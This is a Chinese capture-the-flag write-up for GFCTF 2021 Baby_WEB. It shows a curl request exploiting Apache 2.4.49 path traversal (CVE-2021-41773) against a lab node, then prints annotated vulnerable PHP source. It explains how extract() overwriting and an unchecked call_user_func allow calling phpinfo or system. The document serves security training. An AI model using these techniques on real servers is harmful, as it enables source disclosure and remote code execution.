Baby_WEB([GFCTF 2021] 题目 writeup)
查看源码发现
然后抓包看响应头中的中间件版本:Apache/2.4.49 (Unix)。该版本存在路径穿越漏洞(CVE-2021-41773):对 `.%2e/` 这类 URL 编码后的 `..` 路径段归一化不完整,可以经 cgi-bin 等别名目录读取 DocumentRoot 之外的文件,这里用它来读站点源码。
curl http://node4.anna.nssctf.cn:28805/cgi-bin/.%2e/.%2e/.%2e/.%2e/var/www/index.php.txt
index.php
display($_GET['filename']);?>
用同样的方法继续读取 Class.php(下面贴出的源码是从类的第一个属性中间开始的,类名和 `$date` 默认数组的前半部分缺失):
'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg']; // NOTE(review): the class header and the start of this default array ($this->date = ['version' => ...) are cut off before this chunk
private $template;

// Merges caller-supplied keys over the defaults. array_merge lets later
// string keys win, so every key of $data overrides or extends $this->date.
// In this challenge $data comes from the request (index.php fragment above),
// and $this->date is what display() later extract()s — so request keys
// become local variables in display().
public function __construct($data){
    $this->date = array_merge($this->date,$data);
}

// Resolves the template path. Only $dir === 'admin' uses $template at all:
// '..' is removed by a single (non-recursive) str_replace and the result
// must be an existing file, otherwise the script dies. Any other $dir falls
// back to the fixed index template. str_replace is not a path sanitiser
// (it does not confine the result to ./template/admin/), but no bypass is
// needed for the exploit path in this writeup — index.html there is enough.
public function getTempName($template,$dir){
    if($dir === 'admin'){
        $this->template = str_replace('..','','./template/admin/'.$template);
        if(!is_file($this->template)){
            die("no!!");
        }
    }
    else{
        $this->template = './template/index.html';
    }
}

// Renders a template. SECURITY: extract($this->date) runs BEFORE $space is
// read, and extract() defaults to EXTR_OVERWRITE, so a 'space' (or 'template')
// key in $this->date silently overwrites the method's own parameters. That is
// how the writeup reaches the admin branch with space=admin even though
// index.php only passes $_GET['filename']. Every other request key becomes a
// local variable visible to the included template as well.
public function display($template,$space=''){
    extract($this->date);
    $this->getTempName($template,$space);
    include($this->template);
}

// Parses a single space-separated "key=value key=value ..." string. Keys that
// exist in $system are treated as options, everything else lands in $param.
// With action=function the method calls an arbitrary function named by
// $param['name'] with attacker-supplied string arguments (param0=, param1=,
// ...). function_exists() is an allow-everything check, not an allowlist:
// phpinfo (used in the writeup) passes it, and so would system/exec — i.e.
// this is remote code execution for anyone who can reach listdata() with a
// controlled $_params. $where and most $system options are unused here.
public function listdata($_params){
    $system = [ 'db' => '', 'app' => '', 'num' => '', 'sum' => '', 'form' => '', 'page' => '', 'site' => '', 'flag' => '', 'not_flag' => '', 'show_flag' => '', 'more' => '', 'catid' => '', 'field' => '', 'order' => '', 'space' => '', 'table' => '', 'table_site' => '', 'total' => '', 'join' => '', 'on' => '', 'action' => '', 'return' => '', 'sbpage' => '', 'module' => '', 'urlrule' => '', 'pagesize' => '', 'pagefile' => '', ];
    $param = $where = [];
    $_params = trim($_params);
    // Tokens are split on a single space; a bare leading "list"/"function"
    // token is rewritten to action=... (loose in_array comparison).
    $params = explode(' ', $_params);
    if (in_array($params[0], ['list','function'])) {
        $params[0] = 'action='.$params[0];
    }
    foreach ($params as $t) {
        // A token without '=' yields strpos() === false, so $var is '' and
        // the token is skipped by the !$var check below.
        $var = substr($t, 0, strpos($t, '='));
        $val = substr($t, strpos($t, '=') + 1);
        if (!$var) { continue; }
        if (isset($system[$var])) { $system[$var] = $val; } else { $param[$var] = $val; }
    }
    // action
    switch ($system['action']) {
        case 'function':
            if (!isset($param['name'])) { return 'hacker!!'; }
            elseif (!function_exists($param['name'])) { return 'hacker!!'; }
            // Reads $param['force'] without isset(): when absent this is an
            // undefined-index notice and null, which is falsy — so the call
            // path runs when force is missing, '' or '0'; any truthy force
            // returns null instead (the writeup's "pass anything" is wrong).
            $force = $param['force'];
            if (!$force) {
                // Collect positional arguments from keys starting with
                // "param": the numeric suffix is the argument index
                // (intval('') is 0 for a bare "param" key).
                $p = [];
                foreach ($param as $var => $t) {
                    if (strpos($var, 'param') === 0) {$n = intval(substr($var, 5));$p[$n] = $t; }
                }
                // Arbitrary function call with attacker-controlled arguments.
                if ($p) { $rt = call_user_func_array($param['name'], $p); } else { $rt = call_user_func($param['name']); }
                return $rt;
            }else{
                return null;
            }
        case 'list':
            // Dumps the merged data array (defaults + request input) as JSON.
            return json_encode($this->date);
    }
    return null;
}}
代码中出现了 ./template/admin/ 这个目录,先访问看看里面是什么。
发现该目录下的模板会调用 listdata 方法,并且需要我们通过请求参数传入 action 和 module(参数经 display 中的 extract 进入模板作用域)。
if($dir === 'admin'){
$this->template = str_replace('..','','./template/admin/'.$template);
$template(即 filename)需要传 index.html,因为只有 ./template/admin/index.html 这个模板里才会调用 listdata 方法。
$dir 需要等于 admin。display 的第二个参数 $space 默认为空字符串,但 display 先执行了 extract($this->date),而 $this->date 是构造函数 array_merge 请求参数得到的,所以传入 space=admin 会在 extract 时覆盖局部变量 $space(extract 默认 EXTR_OVERWRITE),从而走到 admin 分支。
template也就是filename需要是 index.html
action需要是function
module也就是mod 赋值
force 不能为真值:代码是 `if (!$force)` 才会进入调用分支,所以 force 要么不传(此时 $param['force'] 未定义,只产生一个 notice,取值为 null),要么传 0 或空字符串;传任意非空值会直接 return null。
$force = $param['force'];
if (!$force) {
接着利用 call_user_func 调用 phpinfo(),在其输出的环境变量里查看结果。
这里写成 `action=function name=phpinfo`,是因为 listdata 先对整个字符串 trim,再按空格 explode 成多个 key=value 对。注意 name 只要求 function_exists() 为真,这不是白名单:换成 system 等函数并配合 param1 传参数,同样能被调用,也就是任意命令执行。
$rt = call_user_func_array($param['name'], $p);
若要走 call_user_func_array 分支,需要 $p 非空,即:
foreach ($param as $var => $t) { if (strpos($var, 'param') === 0) { $n = intval(substr($var, 5)); $p[$n] = $t ; }
这里需要传一个以 param 开头的键(例如 param1=值),intval(substr(键名, 5)) 得到的数字作为该参数的下标。
结束!
来源地址:https://blog.csdn.net/qq_62046696/article/details/130546143
本文标题: [GFCTF 2021] day2